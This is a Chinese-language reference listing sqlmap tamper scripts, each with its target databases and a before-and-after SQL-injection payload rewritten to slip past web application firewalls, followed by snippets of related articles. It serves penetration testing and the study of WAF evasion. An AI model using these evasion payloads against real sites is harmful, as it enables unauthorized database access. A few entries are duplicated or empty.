apostrophemask.py
Function: 用utf8编码引号
Platform:All
example
1 |
1 AND '1'='1 ==> 1 AND %EF%BC%871%EF%BC%87=%EF%BC%871 |
apostrophenullencode.py
Function: ‘ ==> %00%27
Platform: All
example
1 |
1 AND '1'='1 ==> 1 AND %00%271%00%27=%00%271 |
appendnullbyte.py
Function: 空格 ==> %00
Platform: Microsoft Access
example
1 |
1 AND 1=1 ==> 1 AND 1=1%00 |
base64encode.py
Function: base64 encode
Platform: All
example
1 |
1' AND SLEEP(5)# ==> MScgQU5EIFNMRUVQKDUpIw== |
between.py
Function: > ==> NOT BETWEEN 0 AND
Platform: Mssql2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
1 AND A > B-- ==> 1 AND A NOT BETWEEN 0 AND B--```、```1 AND A = B-- ==> 1 AND A BETWEEN B AND B-- |
bluecoat.py
Function: 空格 ==> %09
Platform: MySQL 5.1, SGOS
example
1 |
SELECT id FROM users WHERE id = 1 ==> SELECT%09id FROM%09users WHERE%09id LIKE 1 |
chardoubleencode.py
Function: 双url编码
Platform: All
example
1 |
SELECT FIELD FROM%20TABLE ==> %2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545 |
charencode.py
Function: url编码
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
SELECT FIELD FROM%20TABLE ==> %53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45 |
charunicodeencode.py
Function: escape编码
Platform: Mssql 2000,2005、MySQL 5.1.56、PostgreSQL 9.0.3 ASP/ASP.NET
example
1 |
SELECT FIELD%20FROM TABLE ==> %u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045 |
commalesslimit.py
Function: limit 2,3 ==> LIMIT 3 OFFSET 2
Platform: MySQL 5.0 and 5.5
example
1 |
LIMIT 2, 3 ==> LIMIT 3 OFFSET 2 |
commalessmid.py
Function: MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1)
Platform: MySQL 5.0 and 5.5
example
1 |
MID(VERSION(), 1, 1) ==> MID(VERSION() FROM 1 FOR 1) |
concat2concatws.py
Function: CONCAT() ==> CONCAT_WS()
Platform: MySQL 5.0
example
1 |
CONCAT(1,2) ==> CONCAT_WS(MID(CHAR(0),0,0),1,2) |
equaltolike.py
Function: = ==> like
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5
example
1 |
SELECT * FROM users WHERE id=1 ==> SELECT * FROM users WHERE id LIKE 1 |
escapequotes.py
Function: ‘ ==> \‘、” ==> \“
Platform: All
example
1 |
1" AND SLEEP(5)# ==> 1\\\\" AND SLEEP(5)# |
greatest.py
Function: > ==> GREATEST
Platform: MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
1 AND A > B ==> 1 AND GREATEST(A,B+1)=A |
halfversionedmorekeywords.py
Function: 空格 ==> /*!0
Platform: MySQL 4.0.18, 5.0.22
example
1 |
union ==> /*!0union |
ifnull2ifisnull.py
Function: IFNULL(A, B) ==> IF(ISNULL(A), B, A)
Platform: MySQL 5.0 and 5.5
example
1 |
IFNULL(1, 2) ==> IF(ISNULL(1),2,1) |
informationschemacomment.py
Function: 空格 ==> /**/
Platform: MySQL
example
1 |
SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES |
lowercase.py
Function: INSERT ==> insert
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
SELECT table_name FROM INFORMATION_SCHEMA.TABLES ==> select table_name from information_schema.tables |
modsecurityversioned.py
Function: AND ==> /!12345AND/
Platform: MySQL 5.0
example
1 |
1 AND 2>1-- ==> 1 /*!30874AND 2>1*/-- |
multiplespaces.py
Function: 空格 ==> 多个空格
Platform: All
example
1 |
1 UNION SELECT foobar ==> 1 UNION SELECT foobar |
nonrecursivereplacement.py
Function: union ==> uniunionon
Platform: All
example
1 |
1 UNION SELECT 2-- ==> 1 UNIOUNIONN SELESELECTCT 2-- |
overlongutf8.py
Function: unicode编码
Platform: All
example
1 |
SELECT FIELD FROM TABLE WHERE 2>1 ==> SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1 |
percentage.py
Function: select ==> s%e%l%e%c%t
Platform: Mssql 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
example
1 |
SELECT FIELD FROM TABLE ==> %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E |
randomcase.py
Function: INSERT ==> INseRt
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
INSERT ==> InseRt |
randomcomments.py
Function: INSERT ==> I/**/N/**/SERT
Platform: Mysql
example
1 |
INSERT ==> I/**/N/**/SERT |
securesphere.py
Function: 1 AND 1=1 ==> 1 AND 1=1 and ‘0having’=’0having’
Platform: All
example
1 |
1 AND 1=1 ==> 1 AND 1=1 and '0having'='0having' |
sp_password.py
Function: 空格 ==> sp_password
Platform: Mssql
example
1 |
1 AND 9227=9227-- ==> 1 AND 9227=9227-- sp_password |
space2comment.py
Function: 空格 ==> /**/
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
SELECT id FROM users ==> SELECT/**/id/**/FROM/**/users |
space2dash.py
Function: 空格 ==> –nVNaVoPYeva%0A
Platform:MSSQL、SQLite
example
1 |
1 AND 9227=9227 ==> 1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227 |
space2hash.py
Function: 空格 ==> %23nVNaVoPYeva%0A
Platform: MySQL 4.0, 5.0
example
1 |
1 AND 9227=9227 ==> 1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227 |
space2morehash.py
Function: 空格 ==> %23ngNvzqu%0A
Platform: MySQL 5.1.41
example
1 |
1 AND 9227=9227 ==> 1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227 |
space2mssqlblank.py
Function: 空格 ==> %0E
Platform: Mssql 2000,2005
example
1 |
SELECT id FROM users ==> SELECT%0Eid%0DFROM%07users |
space2mssqlblank.py
Function: 空格 ==> %23%0A
Platform: Mssql、Mysql
example
1 |
1 AND 1=1 ==> 1%23%0AAND%23%0A9227=9227 |
space2mysqlblank.py
Function: 空格 ==> %2B、%0D、%0C
Platform: Mysql5.1
example
1 |
SELECT id FROM users ==> SELECT%0Bid%0DFROM%0Cusers |
space2mysqldash.py
Function: 空格 ==> –%0A
Platform: Mssql、Mysql
example
1 |
1 AND 9227=9227 ==> 1--%0AAND--%0A9227=9227 |
space2plus.py
Function: 空格 ==> +
Platform: All
example
1 |
SELECT id FROM users ==> SELECT+id+FROM+users |
space2randomblank.py
Function: 空格 ==> %0D、%0A、%0C、%09
Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
SELECT id FROM users ==> SELECT%0Did%0DFROM%0Ausers |
symboliclogical.py
Function: and ==> %26%26
Platform: All
example
1 |
1 AND '1'='1 ==> 1 %26%26 '1'='1 |
thinkphp.py
Platform: Mysql
unionalltounion.py
Function: 替换All为空
Platform: All
example
1 |
-1 UNION ALL SELECT ==> -1 UNION SELECT |
unmagicquotes.py
Function: ‘ ==> %df%27
Platform: Mysql magic_quotes/addslashes
example
1 |
1' AND 1=1 ==> 1%bf%27-- |
uppercase.py
Function: 小写转大写
Platform: Mssql 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
example
1 |
insert ==> INSERT |
varnish.py
Function: header头
example
1 |
X-originating-IP: 127.0.0.1 |
versionedkeywords.py
Function: union ==> /!union/
Platform: MySQL 4.0.18, 5.1.56, 5.5.11
example
1 |
1 union select user() ==> 1/*!UNION*//*!SELECT*/user() |
versionedmorekeywords.py
Function: union ==> /!union/
Platform: MySQL 5.1.56, 5.5.11
example
1 |
1 union select user() ==> 1/*!UNION*//*!SELECT*/user() |
xforwardedfor.py
Function: X-Forwarded-For随机头
Platform: All
example
1 |
X-Forwarded-For: 127.0.0.1 |
相关推荐
Sqlmap Tamper脚本编写介绍 Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以绕过WAF。Tamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数...
Sqlmap Tamper脚本分析(MSSQL) Sqlmap Tamper脚本是一种特殊的脚本,用于绕过Web应用程序的防火墙和入侵检测系统,以便进行SQL injection攻击。Tamper脚本可以对payload进行修改,使其能够绕过安全防护机制。下面...
SQLMap之Tamper SQLMap 是一个功能强大的 SQL 注入攻击工具,它提供了 tamper 脚本来帮助攻击者绕过应用程序的敏感字符过滤和 WAF 规则的阻挡,从而进行渗透攻击。tamper 脚本可以在一定程度上避开应用程序的敏感...
"sqlmap Tamper"指的是sqlmap工具中的Tamper模块,这是一个自动化SQL注入工具,用于绕过目标系统的防御机制,帮助检测和利用SQL注入漏洞。 【描述解析】 描述简单地重复了标题的关键信息,强调了这是关于ThinkPHP 3...
web渗透,sqlmap的脚本分类。渗透
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
实战绕过双重waf 玄武盾+程序自身过滤 结合编写sqlmap的tamper获取数据 文档来自互联网仅做学习使用,请勿使用文档相关内容进行违法犯罪活动。
技术性资源文档
sqlmap绕过过滤的 tamper 脚本分类汇总(1).xlsx
SqlMap 的常用 Tamper 脚本释义 SqlMap 是一个功能强大且广泛使用的 SQL 注入检测工具,它提供了多种 tamper 脚本来帮助用户绕过 Web 应用防火墙(WAF)和入侵检测系统(IDS),从而实现对网站漏洞的检测和利用。...
本文档主要说明sqlmap的tamper使用情况以及主要使用方法,很全的说明文档。
Sqlmap Tamper脚本编写介绍.pptx Tamper脚本分析.pptx Sqlmap Tamper脚本分析(MSSQL).pptx 浏览器同源策略介绍.pptx shodan搜索技巧.pptx Sqlmap通用参数.pptx DTD快速入门.pptx XSS发生的位置.pptx XSS跨站脚本...
以一些实际的WAF产品为例,了解它们的基本原理,它们存在的缺陷,以及攻击者是如何利用它们的缺陷让它们形同虚设的。我们应当更注重于注重自身系统和应用的安全,不能以为有了WAF就可以高枕无忧。
收集渗透测试中的Python脚本PythonRaft包括CMS Exploit,逆向反编译插件,渗透测试,Python小工具,信息收集,sqlmap tamper脚本。。相当于python个人军火库
在本课程中,我们将深入探讨Python开发中的几个关键工具,包括sqlmapapi、Tamper模块以及Pocsuite,这些都是在网络安全领域中用于自动化安全检测的重要工具。以下是对这些知识点的详细说明: ### 1. Python的...
sqlmap的-tamper参数是一个非常实用的功能,它允许用户使用各种预定义的脚本来绕过过滤机制,以执行SQL注入攻击。 在使用sqlmap进行攻击时,数据库往往会对注入的SQL代码进行过滤,以防止SQL注入攻击。这些过滤包括...
Tamper脚本的分析是 Sqlmap 中最重要的组件之一,它能够对各种类型的数据库进行攻击,并提供了多种 Tamper Script 来实现攻击。 首先,让我们来了解 Tamper 脚本的常量文件。Tamper 脚本的常量文件是指在 Tamper ...
Sqlmap是一款功能强大且广泛应用的SQL注入工具,本节课程将详细介绍Sqlmap的四个重要参数:强制设置无效值替换、自定义注入负载位置、设置Tamper脚本和设置DBMS认证。 Sqlmap强制设置无效值替换 在 Sqlmap 中,...